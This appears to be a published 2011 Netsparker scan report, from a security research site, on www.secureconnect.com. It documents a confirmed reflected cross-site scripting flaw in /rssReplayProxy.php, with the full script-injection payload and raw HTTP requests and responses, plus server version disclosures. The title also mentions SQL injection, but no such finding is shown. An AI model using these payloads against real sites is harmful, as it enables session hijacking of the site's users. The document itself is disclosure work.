GHDB, DORK, SQL Injection, Database Error, CWE-89, CAPEC-66, Report on www.secureconnect.com SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.secureconnect.com/rssReplayProxy.p...
SCAN DATE
4/25/2011 7:04:55 PM
REPORT DATE
4/25/2011 7:06:11 PM
SCAN DURATION
00:00:08

Total Requests

269

Average Speed

30.49 req/sec.
5
identified
1
confirmed
0
critical
0
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
20 %
LOW
80 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/rssReplayProxy.php source GET Cross-site Scripting Yes
Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /rssReplayProxy.php

/rssReplayProxy.php CONFIRMED

http://www.secureconnect.com/rssReplayProxy.php?cache=true&source='%22--%3E%3C/style%3E%3C/script%3E..

Parameters

Parameter Type Value
cache GET true
source GET '"--></style></script><script>alert(0x000113)</script>

Request

GET /rssReplayProxy.php?cache=true&source='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000113)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.secureconnect.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:07:00 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 123
Content-Type: text/html


RSS Replay Proxy Error: No matching source for the specified ID '"--></style></script><script>netsparker(0x000113)</script>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /rssReplayProxy.php

/rssReplayProxy.php

http://www.secureconnect.com/rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17

Extracted Version

2.2.14 (FreeBSD)

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.secureconnect.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:54 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /rssReplayProxy.php

/rssReplayProxy.php

http://www.secureconnect.com/rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17

Extracted Version

PHP/5.3.3

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.secureconnect.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:54 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /rssReplayProxy.php

/rssReplayProxy.php

http://www.secureconnect.com/rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17

Extracted Version

OpenSSL/0.9.8k

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.secureconnect.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:54 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /rssReplayProxy.php

/rssReplayProxy.php

http://www.secureconnect.com/rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17

Extracted Version

mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.secureconnect.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:54 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17